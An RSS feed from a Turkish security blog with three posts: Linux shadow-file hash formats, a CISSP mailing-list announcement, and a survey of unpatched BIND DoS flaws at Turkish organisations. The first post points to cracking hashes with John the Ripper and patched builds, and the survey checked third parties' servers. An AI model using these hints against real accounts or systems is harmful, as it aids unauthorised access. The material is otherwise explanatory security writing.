<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Complexity is the enemy of Security &#187; Linux Security</title>
	<atom:link href="http://blog.lifeoverip.net/category/linux-security/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.lifeoverip.net</link>
	<description>Life (Over) IP,</description>
	<lastBuildDate>Wed, 08 Sep 2010 11:00:04 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Linux parola güvenliği</title>
		<link>http://blog.lifeoverip.net/2010/05/01/linux-parola-guvenligi/</link>
		<comments>http://blog.lifeoverip.net/2010/05/01/linux-parola-guvenligi/#comments</comments>
		<pubDate>Sat, 01 May 2010 19:40:15 +0000</pubDate>
		<dc:creator>Huzeyfe ONAL</dc:creator>
				<category><![CDATA[Linux Security]]></category>
		<category><![CDATA[linux parola güvenliği]]></category>

		<guid isPermaLink="false">http://blog.lifeoverip.net/?p=2359</guid>
		<description><![CDATA[Linux dağıtımlarında sistem hesaplarının parolaları /etc/shadow dosyasında hash+salt şeklinde saklanır. Salt(tuz) her seferinde değişken olarak atanan bir değerdir, bu şekile aynı parolayı iki kere girildiğinde hash değerleri farklı çıkacaktır. Parola formatı root:$6$GkfJ0/H/$IDtJEzDO1vh8VyDG5rnnLLMXwZl.cikulTg4wtXjq98Vlcf/PA2D1QsT7VHSsu46B/od4IJlqENMtc8dSpBEa1 root: kullanıcı adı ilk $ ile ikinci $ arasındaki sayı hangi şifreleme/hash algoritmasının kullanıldığını belirtir. Buradaki değer 1 ise MD5 2a ise Blowfish [...]


Related posts:<ol><li><a href='http://blog.lifeoverip.net/2008/09/15/linux-leothe-law-enforcement-and-forensic-examiners-introduction-to-linux/' rel='bookmark' title='Permanent Link: Linux LEO(The Law Enforcement and Forensic Examiner&#8217;s Introduction to Linux)'>Linux LEO(The Law Enforcement and Forensic Examiner&#8217;s Introduction to Linux)</a></li>
<li><a href='http://blog.lifeoverip.net/2009/03/01/pratik-openssl-kullanimi/' rel='bookmark' title='Permanent Link: Pratik OpenSSL Kullanımı'>Pratik OpenSSL Kullanımı</a></li>
<li><a href='http://blog.lifeoverip.net/2008/12/01/linux-sistemlerde-zamana-bagli-login-yetkisi/' rel='bookmark' title='Permanent Link: Linux sistemlerde zamana bagli login yetkisi'>Linux sistemlerde zamana bagli login yetkisi</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div>
<p>Linux dağıtımlarında sistem  hesaplarının   parolaları /etc/shadow  dosyasında hash+salt şeklinde saklanır.  Salt(tuz) her   seferinde  değişken olarak atanan bir değerdir, bu şekile aynı parolayı  iki   kere  girildiğinde hash değerleri farklı çıkacaktır.</p>
<p><strong>Parola formatı</strong></p>
<p>root:<strong>$6$</strong><strong>GkfJ0/H/$</strong><strong>IDtJEzDO1vh8VyDG5rnnLLMXwZl.cikulTg4wtXjq98Vlcf/PA2D1QsT7VHSsu46B/od4IJlqENMtc8dSpBEa1</strong><br />
root:  kullanıcı adı<br />
ilk $ ile ikinci $ arasındaki sayı  hangi   şifreleme/hash  algoritmasının kullanıldığını belirtir. Buradaki değer<br />
1 ise MD5<br />
2a ise Blowfish (OpenBSD)<br />
5 ise SHA256<br />
6 ise SHA512 kullanılmış demektir.</p>
<h4><strong>İkinci  $ ile   üçüncü $ arasındaki karekterler parolanın  önceden hazırlanmış hash   değerleri(rainbow table) kullanılarak  yapılacak kırma deneyimlerini   zorlaştırma amaçlıdır ve salt değeri  olarak bilinir.</strong></h4>
<p>Sonraki karekterler de   parolanın şifrelenmiş halidir.</p>
<p>Internet üzerinde MD5 kullanan  parolaları kırmak   için çeşitli  araçları bulunmaktadır(John The Ripper) fakat JTR’in son  sürümü    SHA512 ile hashlenmiş Linux parolalarını kiramamaktadır. Yine internet    üzerinden yapılacka araştırmayla JTR’in SHA512 hashli parolaları   kırabilmesi   için gerekli yamalara ulaşılabilir.</p>
</div>



Share and Enjoy:


	<a rel="nofollow"  href="http://www.printfriendly.com/print?url=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F05%2F01%2Flinux-parola-guvenligi%2F&amp;partner=sociable" title="Print"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/printfriendly.png" title="Print" alt="Print" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F05%2F01%2Flinux-parola-guvenligi%2F&amp;title=Linux%20parola%20g%C3%BCvenli%C4%9Fi&amp;bodytext=%0D%0A%0D%0ALinux%20da%C4%9F%C4%B1t%C4%B1mlar%C4%B1nda%20sistem%20%20hesaplar%C4%B1n%C4%B1n%20%20%20parolalar%C4%B1%20%2Fetc%2Fshadow%20%20dosyas%C4%B1nda%20hash%2Bsalt%20%C5%9Feklinde%20saklan%C4%B1r.%20%20Salt%28tuz%29%20her%20%20%20seferinde%20%20de%C4%9Fi%C5%9Fken%20olarak%20atanan%20bir%20de%C4%9Ferdir%2C%20bu%20%C5%9Fekile%20ayn%C4%B1%20parolay%C4%B1%20%20iki%20%20%20kere%20%20girildi%C4%9Finde%20hash%20d" title="Digg"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F05%2F01%2Flinux-parola-guvenligi%2F" title="Sphinn"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/sphinn.png" title="Sphinn" alt="Sphinn" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://delicious.com/post?url=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F05%2F01%2Flinux-parola-guvenligi%2F&amp;title=Linux%20parola%20g%C3%BCvenli%C4%9Fi&amp;notes=%0D%0A%0D%0ALinux%20da%C4%9F%C4%B1t%C4%B1mlar%C4%B1nda%20sistem%20%20hesaplar%C4%B1n%C4%B1n%20%20%20parolalar%C4%B1%20%2Fetc%2Fshadow%20%20dosyas%C4%B1nda%20hash%2Bsalt%20%C5%9Feklinde%20saklan%C4%B1r.%20%20Salt%28tuz%29%20her%20%20%20seferinde%20%20de%C4%9Fi%C5%9Fken%20olarak%20atanan%20bir%20de%C4%9Ferdir%2C%20bu%20%C5%9Fekile%20ayn%C4%B1%20parolay%C4%B1%20%20iki%20%20%20kere%20%20girildi%C4%9Finde%20hash%20d" title="del.icio.us"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.facebook.com/share.php?u=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F05%2F01%2Flinux-parola-guvenligi%2F&amp;t=Linux%20parola%20g%C3%BCvenli%C4%9Fi" title="Facebook"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F05%2F01%2Flinux-parola-guvenligi%2F&amp;title=Linux%20parola%20g%C3%BCvenli%C4%9Fi" title="Mixx"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F05%2F01%2Flinux-parola-guvenligi%2F&amp;title=Linux%20parola%20g%C3%BCvenli%C4%9Fi&amp;annotation=%0D%0A%0D%0ALinux%20da%C4%9F%C4%B1t%C4%B1mlar%C4%B1nda%20sistem%20%20hesaplar%C4%B1n%C4%B1n%20%20%20parolalar%C4%B1%20%2Fetc%2Fshadow%20%20dosyas%C4%B1nda%20hash%2Bsalt%20%C5%9Feklinde%20saklan%C4%B1r.%20%20Salt%28tuz%29%20her%20%20%20seferinde%20%20de%C4%9Fi%C5%9Fken%20olarak%20atanan%20bir%20de%C4%9Ferdir%2C%20bu%20%C5%9Fekile%20ayn%C4%B1%20parolay%C4%B1%20%20iki%20%20%20kere%20%20girildi%C4%9Finde%20hash%20d" title="Google Bookmarks"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F05%2F01%2Flinux-parola-guvenligi%2F&amp;title=Linux%20parola%20g%C3%BCvenli%C4%9Fi" title="StumbleUpon"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://technorati.com/faves?add=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F05%2F01%2Flinux-parola-guvenligi%2F" title="Technorati"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/technorati.png" title="Technorati" alt="Technorati" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://twitter.com/home?status=Linux%20parola%20g%C3%BCvenli%C4%9Fi%20-%20http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F05%2F01%2Flinux-parola-guvenligi%2F" title="Twitter"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/twitter.png" title="Twitter" alt="Twitter" class="sociable-hovers" /></a>


<br/><br/>

<p>Related posts:<ol><li><a href='http://blog.lifeoverip.net/2008/09/15/linux-leothe-law-enforcement-and-forensic-examiners-introduction-to-linux/' rel='bookmark' title='Permanent Link: Linux LEO(The Law Enforcement and Forensic Examiner&#8217;s Introduction to Linux)'>Linux LEO(The Law Enforcement and Forensic Examiner&#8217;s Introduction to Linux)</a></li>
<li><a href='http://blog.lifeoverip.net/2009/03/01/pratik-openssl-kullanimi/' rel='bookmark' title='Permanent Link: Pratik OpenSSL Kullanımı'>Pratik OpenSSL Kullanımı</a></li>
<li><a href='http://blog.lifeoverip.net/2008/12/01/linux-sistemlerde-zamana-bagli-login-yetkisi/' rel='bookmark' title='Permanent Link: Linux sistemlerde zamana bagli login yetkisi'>Linux sistemlerde zamana bagli login yetkisi</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://blog.lifeoverip.net/2010/05/01/linux-parola-guvenligi/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[CISSP-TR] Türkçe CISSP E-posta Listesi</title>
		<link>http://blog.lifeoverip.net/2010/04/05/cissp-tr-turkce-cissp-e-posta-listesi/</link>
		<comments>http://blog.lifeoverip.net/2010/04/05/cissp-tr-turkce-cissp-e-posta-listesi/#comments</comments>
		<pubDate>Mon, 05 Apr 2010 08:31:01 +0000</pubDate>
		<dc:creator>Huzeyfe ONAL</dc:creator>
				<category><![CDATA[Linux Security]]></category>
		<category><![CDATA[Network Security]]></category>
		<category><![CDATA[System Security]]></category>
		<category><![CDATA[VOIP Security]]></category>
		<category><![CDATA[Web Security]]></category>
		<category><![CDATA[Windows Security]]></category>
		<category><![CDATA[Wireless Security]]></category>
		<category><![CDATA[cissp]]></category>

		<guid isPermaLink="false">http://blog.lifeoverip.net/?p=2184</guid>
		<description><![CDATA[Bilişim dünyasında sertifika programları her zaman tartışmalı olmuştur, sektöre atılmadan önce benzeri tartışmaları üniversite diplomaları için yaptığımızı hatırlıyorum. Sertifika/diplomalar yararlı mı yoksa sadece CV&#8217;lerde gösteriş amaçlı mı işe yarar ? Bu soruyu Güvenlik bülteninin her sayısında çeşitli uzman arkadaşlara soruyoruz ve oldukca çeşitli cevaplar geliyor, merak edenler sertifika programları hakkındaki sektörün ileri gelenleri tarafından verilen [...]


Related posts:<ol><li><a href='http://blog.lifeoverip.net/2006/05/18/ag-ve-guvenlik-e-posta-listesi-acildi/' rel='bookmark' title='Permanent Link: Ag ve Guvenlik E-posta listesi acildi..'>Ag ve Guvenlik E-posta listesi acildi..</a></li>
<li><a href='http://blog.lifeoverip.net/2009/08/20/openssl-ile-wildcard-sertifika-uretimi/' rel='bookmark' title='Permanent Link: OpenSSL ile wildcard sertifika üretimi'>OpenSSL ile wildcard sertifika üretimi</a></li>
<li><a href='http://blog.lifeoverip.net/2009/11/07/takip-edilesi-e-posta-listeleriguvenlik-amacli/' rel='bookmark' title='Permanent Link: Takip edilesi e-posta listeleri(güvenlik amaçlı)'>Takip edilesi e-posta listeleri(güvenlik amaçlı)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Bilişim dünyasında sertifika programları her zaman tartışmalı olmuştur, sektöre atılmadan önce benzeri tartışmaları üniversite diplomaları için yaptığımızı hatırlıyorum. Sertifika/diplomalar yararlı mı yoksa sadece CV&#8217;lerde gösteriş amaçlı mı işe yarar ?</p>
<p>Bu soruyu <a href="http://www.lifeoverip.net/newsletter/">Güvenlik bülteninin </a>her sayısında çeşitli uzman arkadaşlara soruyoruz ve oldukca çeşitli cevaplar geliyor, merak edenler sertifika programları hakkındaki sektörün ileri gelenleri tarafından verilen cevaplara röportajlar kısmından ulaşabilir.</p>
<p>Hayatın bir gerçek yüzü bir de yaşanan yüzü vardır, sertifikalara çeşitli açılardan eleştiri getirebilir, hatta gereksiz denilebilir ama sektörün büyük bir kısmında sertifikaların ciddi şekilde değerlendirmeye alındığı gerçeğini değiştiremeyiz. Özellikle herkesin ben herşeyi biliyorum dediği günümüzde  sertifikalar bilgi ölçme aracı olarak kullanılıyor.</p>
<p>Güvenlik sektöründe uzun yıllardır varlığını geliştirerek sürdürmüş çeşitli sertifikalar vardır. Bunların arasında en karizmatik, en fazla para yapanı hiç şüphesiz <a href="http://www.isc2.org/">ISC2</a> tarafından verilen CISSP sertifikası.  Türkiye&#8217;de de bu sertifikaya olan ihtiyaç ve talep gün geçtikce artıyor. Çeşitli arkadaşlarla konuşurken her birinin Cissp ile ilgili çeşitli forum/listelere üye olduğunu gördüm. Değişik ortamlardan edindikleri bilgileri Türkçe olarak tartışmak, paylaşma adına CISSP-TR listesini kurmaya karar verdim. <span id="more-2184"></span></p>
<p>Liste kısaca Türkiye&#8217;de  Cissp sınavına hazırlananlar için aşağıdaki işlevleri yerine getirme amacı taşımaktadır:</p>
<ul>
<li>Kaynak paylaşımı</li>
<li>Sertifika sınavları hakkında tecrübe paylaşımı</li>
<li>Çalışma gruplarının kurulması ve yönetimi</li>
<li>Ücretli/ücretsiz eğitim duyurularının paylaşılması</li>
</ul>
<p>Liste arşivi sadece üyelere açık olacaktır.</p>
<p><strong>Üye olmak için:</strong></p>
<p><a href="mailto:cissp-tr+subscribe@googlegroups.com">cissp-tr+subscribe@googlegroups.com</a>  adresine boş bir e-posta gönderebilir<br />
ya da<br />
<a href="http://groups.google.com/group/cissp-tr">http://groups.google.com/group/cissp-tr</a> adresine giderek Google hesabınızla listeye kayıt olabilirsiniz.</p>
<p> Liste yönetimi adına &lt;Huzeyfe ÖNAL&gt;</p>



Share and Enjoy:


	<a rel="nofollow"  href="http://www.printfriendly.com/print?url=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F04%2F05%2Fcissp-tr-turkce-cissp-e-posta-listesi%2F&amp;partner=sociable" title="Print"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/printfriendly.png" title="Print" alt="Print" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F04%2F05%2Fcissp-tr-turkce-cissp-e-posta-listesi%2F&amp;title=%5BCISSP-TR%5D%20T%C3%BCrk%C3%A7e%20CISSP%20E-posta%20Listesi&amp;bodytext=Bili%C5%9Fim%20d%C3%BCnyas%C4%B1nda%20sertifika%20programlar%C4%B1%20her%20zaman%20tart%C4%B1%C5%9Fmal%C4%B1%20olmu%C5%9Ftur%2C%20sekt%C3%B6re%20at%C4%B1lmadan%20%C3%B6nce%20benzeri%20tart%C4%B1%C5%9Fmalar%C4%B1%20%C3%BCniversite%20diplomalar%C4%B1%20i%C3%A7in%20yapt%C4%B1%C4%9F%C4%B1m%C4%B1z%C4%B1%20hat%C4%B1rl%C4%B1yorum.%20Sertifika%2Fdiplomalar%20yararl%C4%B1%20m%C4%B1%20yoksa%20sadece%20CV%27lerde%20" title="Digg"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F04%2F05%2Fcissp-tr-turkce-cissp-e-posta-listesi%2F" title="Sphinn"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/sphinn.png" title="Sphinn" alt="Sphinn" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://delicious.com/post?url=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F04%2F05%2Fcissp-tr-turkce-cissp-e-posta-listesi%2F&amp;title=%5BCISSP-TR%5D%20T%C3%BCrk%C3%A7e%20CISSP%20E-posta%20Listesi&amp;notes=Bili%C5%9Fim%20d%C3%BCnyas%C4%B1nda%20sertifika%20programlar%C4%B1%20her%20zaman%20tart%C4%B1%C5%9Fmal%C4%B1%20olmu%C5%9Ftur%2C%20sekt%C3%B6re%20at%C4%B1lmadan%20%C3%B6nce%20benzeri%20tart%C4%B1%C5%9Fmalar%C4%B1%20%C3%BCniversite%20diplomalar%C4%B1%20i%C3%A7in%20yapt%C4%B1%C4%9F%C4%B1m%C4%B1z%C4%B1%20hat%C4%B1rl%C4%B1yorum.%20Sertifika%2Fdiplomalar%20yararl%C4%B1%20m%C4%B1%20yoksa%20sadece%20CV%27lerde%20" title="del.icio.us"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.facebook.com/share.php?u=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F04%2F05%2Fcissp-tr-turkce-cissp-e-posta-listesi%2F&amp;t=%5BCISSP-TR%5D%20T%C3%BCrk%C3%A7e%20CISSP%20E-posta%20Listesi" title="Facebook"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F04%2F05%2Fcissp-tr-turkce-cissp-e-posta-listesi%2F&amp;title=%5BCISSP-TR%5D%20T%C3%BCrk%C3%A7e%20CISSP%20E-posta%20Listesi" title="Mixx"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F04%2F05%2Fcissp-tr-turkce-cissp-e-posta-listesi%2F&amp;title=%5BCISSP-TR%5D%20T%C3%BCrk%C3%A7e%20CISSP%20E-posta%20Listesi&amp;annotation=Bili%C5%9Fim%20d%C3%BCnyas%C4%B1nda%20sertifika%20programlar%C4%B1%20her%20zaman%20tart%C4%B1%C5%9Fmal%C4%B1%20olmu%C5%9Ftur%2C%20sekt%C3%B6re%20at%C4%B1lmadan%20%C3%B6nce%20benzeri%20tart%C4%B1%C5%9Fmalar%C4%B1%20%C3%BCniversite%20diplomalar%C4%B1%20i%C3%A7in%20yapt%C4%B1%C4%9F%C4%B1m%C4%B1z%C4%B1%20hat%C4%B1rl%C4%B1yorum.%20Sertifika%2Fdiplomalar%20yararl%C4%B1%20m%C4%B1%20yoksa%20sadece%20CV%27lerde%20" title="Google Bookmarks"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F04%2F05%2Fcissp-tr-turkce-cissp-e-posta-listesi%2F&amp;title=%5BCISSP-TR%5D%20T%C3%BCrk%C3%A7e%20CISSP%20E-posta%20Listesi" title="StumbleUpon"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://technorati.com/faves?add=http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F04%2F05%2Fcissp-tr-turkce-cissp-e-posta-listesi%2F" title="Technorati"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/technorati.png" title="Technorati" alt="Technorati" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://twitter.com/home?status=%5BCISSP-TR%5D%20T%C3%BCrk%C3%A7e%20CISSP%20E-posta%20Listesi%20-%20http%3A%2F%2Fblog.lifeoverip.net%2F2010%2F04%2F05%2Fcissp-tr-turkce-cissp-e-posta-listesi%2F" title="Twitter"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/twitter.png" title="Twitter" alt="Twitter" class="sociable-hovers" /></a>


<br/><br/>

<p>Related posts:<ol><li><a href='http://blog.lifeoverip.net/2006/05/18/ag-ve-guvenlik-e-posta-listesi-acildi/' rel='bookmark' title='Permanent Link: Ag ve Guvenlik E-posta listesi acildi..'>Ag ve Guvenlik E-posta listesi acildi..</a></li>
<li><a href='http://blog.lifeoverip.net/2009/08/20/openssl-ile-wildcard-sertifika-uretimi/' rel='bookmark' title='Permanent Link: OpenSSL ile wildcard sertifika üretimi'>OpenSSL ile wildcard sertifika üretimi</a></li>
<li><a href='http://blog.lifeoverip.net/2009/11/07/takip-edilesi-e-posta-listeleriguvenlik-amacli/' rel='bookmark' title='Permanent Link: Takip edilesi e-posta listeleri(güvenlik amaçlı)'>Takip edilesi e-posta listeleri(güvenlik amaçlı)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://blog.lifeoverip.net/2010/04/05/cissp-tr-turkce-cissp-e-posta-listesi/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Güvenliği ciddiye alıyor musunuz? Bind DOS Zaafiyeti</title>
		<link>http://blog.lifeoverip.net/2009/11/07/guvenligi-ciddiye-aliyor-musunuz-bind-dos-zaafiyeti/</link>
		<comments>http://blog.lifeoverip.net/2009/11/07/guvenligi-ciddiye-aliyor-musunuz-bind-dos-zaafiyeti/#comments</comments>
		<pubDate>Sat, 07 Nov 2009 12:35:40 +0000</pubDate>
		<dc:creator>Huzeyfe ONAL</dc:creator>
				<category><![CDATA[DNS]]></category>
		<category><![CDATA[Linux Security]]></category>
		<category><![CDATA[Misc]]></category>
		<category><![CDATA[Network Security]]></category>

		<guid isPermaLink="false">http://blog.lifeoverip.net/?p=1442</guid>
		<description><![CDATA[Yaklaşık olarak üç ay önce tüm ISC Bind sürümlerini etkileyen bir açıklık yayınlandı.  Açıklık DNS servisini etkilediği için çok kritikti( dns&#8217;in çalismamasi ne demek? Mail alisverisinin durmasi, web sayfalarinin çalismamasi, ISP&#8217;ler için müsterilerinin internetinin gitmesi(müsteri için dns vs yoktur internet çalisiyor ya da çalismiyordur). Bu açıklığa göre internetin %80 gibi büyük bir oranına dns hizmeti sağlayan Bind [...]


Related posts:<ol><li><a href='http://blog.lifeoverip.net/2009/07/29/bind-9-dynamic-update-dos-zaafiyeti/' rel='bookmark' title='Permanent Link: BIND 9 Dynamic Update DoS Zaafiyeti- Acil'>BIND 9 Dynamic Update DoS Zaafiyeti- Acil</a></li>
<li><a href='http://blog.lifeoverip.net/2007/07/26/bind-9-cache-poisoning-zayifligi-ve-openbsd/' rel='bookmark' title='Permanent Link: BIND 9 cache poisoning zayifligi ve OpenBSD'>BIND 9 cache poisoning zayifligi ve OpenBSD</a></li>
<li><a href='http://blog.lifeoverip.net/2009/01/12/guvenligi-gercekten-ciddiye-aliyor-muyuz-dns-cache-poisoning-acikligi/' rel='bookmark' title='Permanent Link: Güvenligi gercekten ciddiye aliyor muyuz-DNS Cache poisoning acikligi'>Güvenligi gercekten ciddiye aliyor muyuz-DNS Cache poisoning acikligi</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><img class="size-full wp-image-1698 alignright" title="careful" src="http://blog.lifeoverip.net/wp-content/uploads/2009/11/careful.jpg" alt="careful" width="189" height="163" /></p>
<p>Yaklaşık olarak üç ay önce tüm ISC Bind sürümlerini etkileyen bir açıklık yayınlandı.  Açıklık DNS servisini etkilediği için çok kritikti( <strong>dns&#8217;in çalismamasi ne demek</strong>? Mail alisverisinin durmasi, web sayfalarinin çalismamasi, ISP&#8217;ler için müsterilerinin internetinin gitmesi(müsteri için dns vs yoktur internet çalisiyor ya da çalismiyordur).</p>
<p>Bu açıklığa göre internetin %80 gibi büyük bir oranına dns hizmeti sağlayan Bind yazılımı kullananların verdikleri dns hizmeti  uzaktan tek bir dns paketiyle kapatılabiliyordu. Açıklığın çıktığı tarihlerde -tam da Türkiye&#8217;de 3G hizmetinin duyurulduğu gün- çoğu arkadaşımı bizzat arayarak sistemlerini yamalarını sağlamıştım. Kendi yöneticilerimize de konunun ciddiyetini anlatmak için exploiti düzenleyerek(uzaktan kimin gönderdiği belli olmayacak şekilde spoof ip ile) kendi sistemlerimizde test amaçlı çalıştırmıştık. <span id="more-1442"></span></p>
<p>Açıklığın üzerinden iki ay geçtikten sonra klasik araştırmalarımdan birini bu konuya ayırdım. Amacım acaba Türkiye&#8217;de konu ne kadar ciddiye alınmıştı, bizlere güvenlik hizmeti satan firmalar, güvenlik eğitimi veren kurumlar, ötesinde Türkiye&#8217;nin güvenliğini (hem sanal hem sosyal) sağlamaya çalışan kurumlar kendilerini korumaya almışlar mıydı sorusunun cevabını bulabilmekti.</p>
<p><em>Geçtiğimiz yıl yine DNS sunucuları etkileyen cache  poisoning açıklığı sonrasında yaptığımız araştırmada oran bu araştırmadan daha düşük çıkmıştı. Bunda linux/unix üzerine kurulan sistemlerin daha geç güncellendiği sonucunu çıkarmıştık.</em></p>
<p><strong>Güvenlik Firmaları ve Bind DOS Zaafiyeti</strong></p>
<p>Rastgele seçilen bilgi güvenliği firmalarının dns sunucularının<strong> %80&#8242;i</strong> hala ilgili açıklık için yama yüklememiş durumda. Bize güvenlik hizmeti veren firmalar kendi güvenliklerine dikkat etmiyorsa buradan şu sonuç çıkıyor: firmalar bu işi sadece maddi kazanç için yapıyorlar, kalite vs pek dikkate alinmiyor. Bu firmalar arasında bazılarının pentest hizmeti verdiğini de düşünürsek tam bir kendi söküğünü dikemeyen terzi durumu çıkıyor karşımıza.</p>
<p><strong>ISP&#8217;ler ve Bind DOS zaafiyeti</strong></p>
<p>ISP&#8217;lerin hemen hepsi bu açıklığa karşı korumasız durumda. Aralarında windows kullanan azınlık grubu saymazsak Bind kullananların çoğu güncelleme yapmamış.</p>
<p><strong>Hosting firmaları ve Bind DOS Zaafiyeti</strong></p>
<p>Hosting firmaları da bu konuda sınıfta kalanlardan. Hosting firmalarının çoğu kendi dns sunucusunu kullanmadığı için ISP&#8217;lerdeki zaafiyet onları da doğrudan etkiliyor. Hosting firmalarında durum %70 civarlarında. Normalde bu oranın %95 olacağını tahmin ediyordum ama aralarında Windows DNS kullananlar olduğu için oran düşük çıktı.</p>
<p><strong>Üniversiteler ve Bind DOS Zaafiyeti</strong></p>
<p>Güzide üniversitelerimizde açıklıktan sonra sistemlerine hiç dokunmayanlardan. Rastgele seçilen üniversitelerden çıkan sonuç %85 oranında bu zaafiyete karşı korumasız oldukları.</p>
<p><strong>Eğitim kurumları ve Bind DOS Zaafiyeti</strong></p>
<p>İçlerinde bilgi güvenliği , linux, sistem yönetimi vs konularında çeşitli eğitimler veren firmaların da bulunduğu test grubu da güvenliği sadece konuşmak ve satmak üzerine algılayanlardan. Eğitim kurumlarında %85 oranında Bind DOS zaafiyetinden etkileniyor.</p>
<p><strong>Sonuç</strong></p>
<p>Sonuç olarak Türkiye bilgi güvenliği konusunda yapılacak bir kalite testinde sınıfta kalacaktır. Tek işi güvenlik olan ve firmalara ürün satmak için onları sistemlerinde çıkabilecek açıklıklarla korkutanların kendi sistemlerini hiç dikkate almadığı görülüyor.</p>
<p>Çoğu sistem yöneticisinin DNS sunucularımızı X firması yönetiyor nasıl olsa onlar düşünmüştür şeklinde bir yaklaşımla hiç test etme ihtiyacı hissetmemişler. Yine Linux/UNIX sistem yöneticilerinin  biraz tembellik yaptığı sonucunu da çıkarabiliriz. Bunun temel sebebi Linux kullanıyoruz, nasıl olsa güvenlidir yaklaşımı olduğunu düşünüyorum. Oysa günümüz dünyasında artık gerçekten güvenlidir diyebileceğimiz bir sistem kalmadı. İş artık daha çok sistem/network/güvenlik yöneticilerine kalıyor.</p>
<p><strong>Umarım bu sonuçlar birilerini harekete geçirir ve kendi sistemlerine de bakma ihtiyacı hissederler</strong></p>
<p>Not:Testlerin yapılışı kesinlikle hedef sistemlere zarar vermeyecek şekilde sıradan dns istekleri göndererek yapılmıştır.</p>
